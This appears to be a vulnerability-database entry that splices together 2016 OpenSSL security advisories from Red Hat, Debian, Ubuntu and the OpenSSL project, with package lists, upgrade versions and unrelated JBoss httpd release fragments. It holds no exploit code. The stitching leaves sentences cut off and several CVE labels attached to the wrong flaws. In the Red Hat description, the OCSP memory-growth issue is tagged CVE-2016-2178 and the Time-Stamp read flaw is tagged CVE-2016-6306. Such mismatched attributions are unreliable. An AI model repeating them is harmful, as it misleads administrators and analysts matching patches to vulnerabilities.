x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2016-2177 https://access.redhat.com/security/cve/CVE-2016-2178 https://access.redhat.com/security/cve/CVE-2016-2179 https://access.redhat.com/security/cve/CVE-2016-2180 https://access.redhat.com/security/cve/CVE-2016-2181 https://access.redhat.com/security/cve/CVE-2016-2182 https://access.redhat.com/security/cve/CVE-2016-6302 https://access.redhat.com/security/cve/CVE-2016-6304 https://access.redhat.com/security/cve/CVE-2016-6306 https://access.redhat.com/security/updates/classification/#important https://www.openssl.org/news/secadv/20160922.txt
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFX6nnFXlSAg2UNWIIRAqklAJ9uGMit/wxZ0CfuGjR7Vi2+AjmGMwCfTpEI xpTW7ApBLmKhVjs49DGYouI= =4VgY -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Solution:
The References section of this erratum contains a download link (you must log in to download the update). Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files).
After installing the updated packages, the httpd daemon will be restarted automatically. Additional information can be found at https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/
CVE-2016-2178
Cesar Pereida, Billy Brumley and Yuval Yarom discovered a timing
leak in the DSA code.
CVE-2016-2179 / CVE-2016-2181
Quan Luo and the OCAP audit team discovered denial of service
vulnerabilities in DTLS.
For the stable distribution (jessie), these problems have been fixed in version 1.0.1t-1+deb8u4.
For the unstable distribution (sid), these problems will be fixed soon. ========================================================================== Ubuntu Security Notice USN-3087-2 September 23, 2016
openssl regression
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
USN-3087-1 introduced a regression in OpenSSL. The fix for CVE-2016-2182 was incomplete and caused a regression when parsing certificates. This update fixes the problem.
We apologize for the inconvenience. This issue has only been addressed in Ubuntu 16.04 LTS in this update. (CVE-2016-2178) Quan Luo discovered that OpenSSL did not properly restrict the lifetime of queue entries in the DTLS implementation. (CVE-2016-2181) Shi Lei discovered that OpenSSL incorrectly validated division results. (CVE-2016-2182) Karthik Bhargavan and Gaetan Leurent discovered that the DES and Triple DES ciphers were vulnerable to birthday attacks. (CVE-2016-2183) Shi Lei discovered that OpenSSL incorrectly handled certain ticket lengths. (CVE-2016-6303) Shi Lei discovered that OpenSSL incorrectly performed certain message length checks. (CVE-2016-6306)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 LTS: libssl1.0.0 1.0.2g-1ubuntu4.5
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.21
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.38
After a standard system update you need to reboot your computer to make all the necessary changes. Description:
This release adds the new Apache HTTP Server 2.4.29 packages that are part of the JBoss Core Services offering.
This release serves as a replacement for Red Hat JBoss Core Services Apache HTTP Server 2.4.23, and includes bug fixes and enhancements. Refer to the Release Notes for information on the most significant bug fixes, enhancements and component upgrades included in this release. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. JIRA issues fixed (https://issues.jboss.org/):
JBCS-373 - Errata for httpd 2.4.29 GA RHEL 7
7
Show details on source website{
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"description": {
"_id": null,
"data": "The BN_bn2dec function in crypto/bn/bn_print.c in OpenSSL before 1.1.0 does not properly validate division results, which allows remote attackers to cause a denial of service (out-of-bounds write and application crash) or possibly have unspecified other impact via unknown vectors. ( Out-of-bounds writes and application crashes ) There are vulnerabilities that are subject to unspecified impact, such as being put into a state. Supplementary information : CWE Vulnerability type by CWE-787: Out-of-bounds Write ( Out-of-bounds writing ) Has been identified. http://cwe.mitre.org/data/definitions/787.htmlService disruption by a third party ( Out-of-bounds writes and application crashes ) There is a possibility of being affected unspecified, such as being in a state. OpenSSL is prone to denial-of-service vulnerability. \nAn attacker may exploit this issue to crash the affected application, resulting in denial-of-service condition. \nOpenSSL Security Advisory [22 Sep 2016]\n========================================\n\nOCSP Status Request extension unbounded memory growth (CVE-2016-6304)\n=====================================================================\n\nSeverity: High\n\nA malicious client can send an excessively large OCSP Status Request extension. \nIf that client continually requests renegotiation, sending a large OCSP Status\nRequest extension each time, then there will be unbounded memory growth on the\nserver. This will eventually lead to a Denial Of Service attack through memory\nexhaustion. Servers with a default configuration are vulnerable even if they do\nnot support OCSP. Builds using the \"no-ocsp\" build time option are not affected. \n\nServers using OpenSSL versions prior to 1.0.1g are not vulnerable in a default\nconfiguration, instead only if an application explicitly enables OCSP stapling\nsupport. \n\nOpenSSL 1.1.0 users should upgrade to 1.1.0a\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 29th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nSSL_peek() hang on empty record (CVE-2016-6305)\n===============================================\n\nSeverity: Moderate\n\nOpenSSL 1.1.0 SSL/TLS will hang during a call to SSL_peek() if the peer sends an\nempty record. This could be exploited by a malicious peer in a Denial Of Service\nattack. \n\nOpenSSL 1.1.0 users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 10th September 2016 by Alex Gaynor. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nSWEET32 Mitigation (CVE-2016-2183)\n==================================\n\nSeverity: Low\n\nSWEET32 (https://sweet32.info) is an attack on older block cipher algorithms\nthat use a block size of 64 bits. In mitigation for the SWEET32 attack DES based\nciphersuites have been moved from the HIGH cipherstring group to MEDIUM in\nOpenSSL 1.0.1 and OpenSSL 1.0.2. OpenSSL 1.1.0 since release has had these\nciphersuites disabled by default. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 16th August 2016 by Karthikeyan\nBhargavan and Gaetan Leurent (INRIA). The fix was developed by Rich Salz of the\nOpenSSL development team. \n\nOOB write in MDC2_Update() (CVE-2016-6303)\n==========================================\n\nSeverity: Low\n\nAn overflow can occur in MDC2_Update() either if called directly or\nthrough the EVP_DigestUpdate() function using MDC2. If an attacker\nis able to supply very large amounts of input data after a previous\ncall to EVP_EncryptUpdate() with a partial block then a length check\ncan overflow resulting in a heap corruption. \n\nThe amount of data needed is comparable to SIZE_MAX which is impractical\non most platforms. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 11th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nMalformed SHA512 ticket DoS (CVE-2016-6302)\n===========================================\n\nSeverity: Low\n\nIf a server uses SHA512 for TLS session ticket HMAC it is vulnerable to a\nDoS attack where a malformed ticket will result in an OOB read which will\nultimately crash. \n\nThe use of SHA512 in TLS session tickets is comparatively rare as it requires\na custom server callback and ticket lookup mechanism. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 19th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nOOB write in BN_bn2dec() (CVE-2016-2182)\n========================================\n\nSeverity: Low\n\nThe function BN_bn2dec() does not check the return value of BN_div_word(). \nThis can cause an OOB write if an application uses this function with an\noverly large BIGNUM. This could be a problem if an overly large certificate\nor CRL is printed out from an untrusted source. TLS is not affected because\nrecord limits will reject an oversized certificate before it is parsed. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 2nd August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nOOB read in TS_OBJ_print_bio() (CVE-2016-2180)\n==============================================\n\nSeverity: Low\n\nThe function TS_OBJ_print_bio() misuses OBJ_obj2txt(): the return value is\nthe total length the OID text representation would use and not the amount\nof data written. This will result in OOB reads when large OIDs are presented. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 21st July 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nPointer arithmetic undefined behaviour (CVE-2016-2177)\n======================================================\n\nSeverity: Low\n\nAvoid some undefined pointer arithmetic\n\nA common idiom in the codebase is to check limits in the following manner:\n\"p + len \u003e limit\"\n\nWhere \"p\" points to some malloc\u0027d data of SIZE bytes and\nlimit == p + SIZE\n\n\"len\" here could be from some externally supplied data (e.g. from a TLS\nmessage). \n\nThe rules of C pointer arithmetic are such that \"p + len\" is only well\ndefined where len \u003c= SIZE. Therefore the above idiom is actually\nundefined behaviour. \n\nFor example this could cause problems if some malloc implementation\nprovides an address for \"p\" such that \"p + len\" actually overflows for\nvalues of len that are too big and therefore p + len \u003c limit. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 4th May 2016 by Guido Vranken. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nConstant time flag not preserved in DSA signing (CVE-2016-2178)\n===============================================================\n\nSeverity: Low\n\nOperations in the DSA signing algorithm should run in constant time in order to\navoid side channel attacks. A flaw in the OpenSSL DSA implementation means that\na non-constant time codepath is followed for certain operations. This has been\ndemonstrated through a cache-timing attack to be sufficient for an attacker to\nrecover the private DSA key. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 23rd May 2016 by C\u00e9sar Pereida (Aalto\nUniversity), Billy Brumley (Tampere University of Technology), and Yuval Yarom\n(The University of Adelaide and NICTA). The fix was developed by C\u00e9sar Pereida. \n\nDTLS buffered message DoS (CVE-2016-2179)\n=========================================\n\nSeverity: Low\n\nIn a DTLS connection where handshake messages are delivered out-of-order those\nmessages that OpenSSL is not yet ready to process will be buffered for later\nuse. Under certain circumstances, a flaw in the logic means that those messages\ndo not get removed from the buffer even though the handshake has been completed. \nAn attacker could force up to approx. 15 messages to remain in the buffer when\nthey are no longer required. These messages will be cleared when the DTLS\nconnection is closed. The default maximum size for a message is 100k. Therefore\nthe attacker could force an additional 1500k to be consumed per connection. By\nopening many simulataneous connections an attacker could cause a DoS attack\nthrough memory exhaustion. \n\nOpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i\nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 22nd June 2016 by Quan Luo. The fix was\ndeveloped by Matt Caswell of the OpenSSL development team. \n\nDTLS replay protection DoS (CVE-2016-2181)\n==========================================\n\nSeverity: Low\n\nA flaw in the DTLS replay attack protection mechanism means that records that\narrive for future epochs update the replay protection \"window\" before the MAC\nfor the record has been validated. This could be exploited by an attacker by\nsending a record for the next epoch (which does not have to decrypt or have a\nvalid MAC), with a very large sequence number. This means that all subsequent\nlegitimate packets are dropped causing a denial of service for a specific\nDTLS connection. \n\nOpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i\nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 21st November 2015 by the OCAP audit team. \nThe fix was developed by Matt Caswell of the OpenSSL development team. \n\nCertificate message OOB reads (CVE-2016-6306)\n=============================================\n\nSeverity: Low\n\nIn OpenSSL 1.0.2 and earlier some missing message length checks can result in\nOOB reads of up to 2 bytes beyond an allocated buffer. There is a theoretical\nDoS risk but this has not been observed in practice on common platforms. \n\nThe messages affected are client certificate, client certificate request and\nserver certificate. As a result the attack can only be performed against\na client or a server which enables client authentication. \n\nOpenSSL 1.1.0 is not affected. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 22nd August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nExcessive allocation of memory in tls_get_message_header() (CVE-2016-6307)\n==========================================================================\n\nSeverity: Low\n\nA TLS message includes 3 bytes for its length in the header for the message. \nThis would allow for messages up to 16Mb in length. Messages of this length are\nexcessive and OpenSSL includes a check to ensure that a peer is sending\nreasonably sized messages in order to avoid too much memory being consumed to\nservice a connection. A flaw in the logic of version 1.1.0 means that memory for\nthe message is allocated too early, prior to the excessive message length\ncheck. Due to way memory is allocated in OpenSSL this could mean an attacker\ncould force up to 21Mb to be allocated to service a connection. This could lead\nto a Denial of Service through memory exhaustion. However, the excessive message\nlength check still takes place, and this would cause the connection to\nimmediately fail. Assuming that the application calls SSL_free() on the failed\nconneciton in a timely manner then the 21Mb of allocated memory will then be\nimmediately freed again. Therefore the excessive memory allocation will be\ntransitory in nature. This then means that there is only a security impact if:\n\n1) The application does not call SSL_free() in a timely manner in the\nevent that the connection fails\nor\n2) The application is working in a constrained environment where there\nis very little free memory\nor\n3) The attacker initiates multiple connection attempts such that there\nare multiple connections in a state where memory has been allocated for\nthe connection; SSL_free() has not yet been called; and there is\ninsufficient memory to service the multiple requests. \n\nExcept in the instance of (1) above any Denial Of Service is likely to\nbe transitory because as soon as the connection fails the memory is\nsubsequently freed again in the SSL_free() call. However there is an\nincreased risk during this period of application crashes due to the lack\nof memory - which would then mean a more serious Denial of Service. \n\nThis issue does not affect DTLS users. \n\nOpenSSL 1.1.0 TLS users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nExcessive allocation of memory in dtls1_preprocess_fragment() (CVE-2016-6308)\n=============================================================================\n\nSeverity: Low\n\nThis issue is very similar to CVE-2016-6307. The underlying defect is different\nbut the security analysis and impacts are the same except that it impacts DTLS. \n\nA DTLS message includes 3 bytes for its length in the header for the message. \nThis would allow for messages up to 16Mb in length. Messages of this length are\nexcessive and OpenSSL includes a check to ensure that a peer is sending\nreasonably sized messages in order to avoid too much memory being consumed to\nservice a connection. A flaw in the logic of version 1.1.0 means that memory for\nthe message is allocated too early, prior to the excessive message length\ncheck. Due to way memory is allocated in OpenSSL this could mean an attacker\ncould force up to 21Mb to be allocated to service a connection. This could lead\nto a Denial of Service through memory exhaustion. However, the excessive message\nlength check still takes place, and this would cause the connection to\nimmediately fail. Assuming that the application calls SSL_free() on the failed\nconneciton in a timely manner then the 21Mb of allocated memory will then be\nimmediately freed again. Therefore the excessive memory allocation will be\ntransitory in nature. This then means that there is only a security impact if:\n\n1) The application does not call SSL_free() in a timely manner in the\nevent that the connection fails\nor\n2) The application is working in a constrained environment where there\nis very little free memory\nor\n3) The attacker initiates multiple connection attempts such that there\nare multiple connections in a state where memory has been allocated for\nthe connection; SSL_free() has not yet been called; and there is\ninsufficient memory to service the multiple requests. \n\nExcept in the instance of (1) above any Denial Of Service is likely to\nbe transitory because as soon as the connection fails the memory is\nsubsequently freed again in the SSL_free() call. However there is an\nincreased risk during this period of application crashes due to the lack\nof memory - which would then mean a more serious Denial of Service. \n\nThis issue does not affect TLS users. \n\nOpenSSL 1.1.0 DTLS users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nNote\n====\n\nAs per our previous announcements and our Release Strategy\n(https://www.openssl.org/policies/releasestrat.html), support for OpenSSL\nversion 1.0.1 will cease on 31st December 2016. No security updates for that\nversion will be provided after that date. Users of 1.0.1 are advised to\nupgrade. \n\nSupport for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those\nversions are no longer receiving security updates. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv/20160922.txt\n\nNote: the online version of the advisory may be updated with additional details\nover time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/policies/secpolicy.html\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: openssl security update\nAdvisory ID: RHSA-2016:1940-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-1940.html\nIssue date: 2016-09-27\nCVE Names: CVE-2016-2177 CVE-2016-2178 CVE-2016-2179 \n CVE-2016-2180 CVE-2016-2181 CVE-2016-2182 \n CVE-2016-6302 CVE-2016-6304 CVE-2016-6306 \n=====================================================================\n\n1. Summary:\n\nAn update for openssl is now available for Red Hat Enterprise Linux 6 and\nRed Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and\nTransport Layer Security (TLS) protocols, as well as a full-strength\ngeneral-purpose cryptography library. A remote attacker\ncould cause a TLS server using OpenSSL to consume an excessive amount of\nmemory and, possibly, exit unexpectedly after exhausting all available\nmemory, if it enabled OCSP stapling support. \n(CVE-2016-2178)\n\n* It was discovered that the Datagram TLS (DTLS) implementation could fail\nto release memory in certain cases. A malicious DTLS client could cause a\nDTLS server using OpenSSL to consume an excessive amount of memory and,\npossibly, exit unexpectedly after exhausting all available memory. A remote attacker could possibly use this flaw\nto make a DTLS server using OpenSSL to reject further packets sent from a\nDTLS client over an established DTLS connection. (CVE-2016-2181)\n\n* An out of bounds write flaw was discovered in the OpenSSL BN_bn2dec()\nfunction. (CVE-2016-2182)\n\n* A flaw was found in the DES/3DES cipher was used as part of the TLS/SSL\nprotocol. A man-in-the-middle attacker could use this flaw to recover some\nplaintext data by capturing large amounts of encrypted traffic between\nTLS/SSL server and client if the communication used a DES/3DES based\nciphersuite. (CVE-2016-2183)\n\nThis update mitigates the CVE-2016-2183 issue by lowering priority of DES\ncipher suites so they are not preferred over cipher suites using AES. For\ncompatibility reasons, DES cipher suites remain enabled by default and\nincluded in the set of cipher suites identified by the HIGH cipher string. \nFuture updates may move them to MEDIUM or not enable them by default. \n\n* An integer underflow flaw leading to a buffer over-read was found in the\nway OpenSSL parsed TLS session tickets. (CVE-2016-6302)\n\n* Multiple integer overflow flaws were found in the way OpenSSL performed\npointer arithmetic. A remote attacker could possibly use these flaws to\ncause a TLS/SSL server or client using OpenSSL to crash. (CVE-2016-2177)\n\n* An out of bounds read flaw was found in the way OpenSSL formatted Public\nKey Infrastructure Time-Stamp Protocol data for printing. A remote attacker could\npossibly use these flaws to crash a TLS/SSL server or client using OpenSSL. \n(CVE-2016-6306)\n\nRed Hat would like to thank the OpenSSL project for reporting CVE-2016-6304\nand CVE-2016-6306 and OpenVPN for reporting CVE-2016-2183. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase\n1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation\n1359615 - CVE-2016-2180 OpenSSL: OOB read in TS_OBJ_print_bio()\n1367340 - CVE-2016-2182 openssl: Out-of-bounds write caused by unchecked errors in BN_bn2dec()\n1369113 - CVE-2016-2181 openssl: DTLS replay protection bypass allows DoS against DTLS connection\n1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32)\n1369504 - CVE-2016-2179 openssl: DTLS memory exhaustion DoS when messages are not removed from fragment buffer\n1369855 - CVE-2016-6302 openssl: Insufficient TLS session ticket HMAC length checks\n1377594 - CVE-2016-6306 openssl: certificate message OOB reads\n1377600 - CVE-2016-6304 openssl: OCSP Status Request extension unbounded memory growth\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\n\nppc64:\nopenssl-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-static-1.0.1e-48.el6_8.3.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 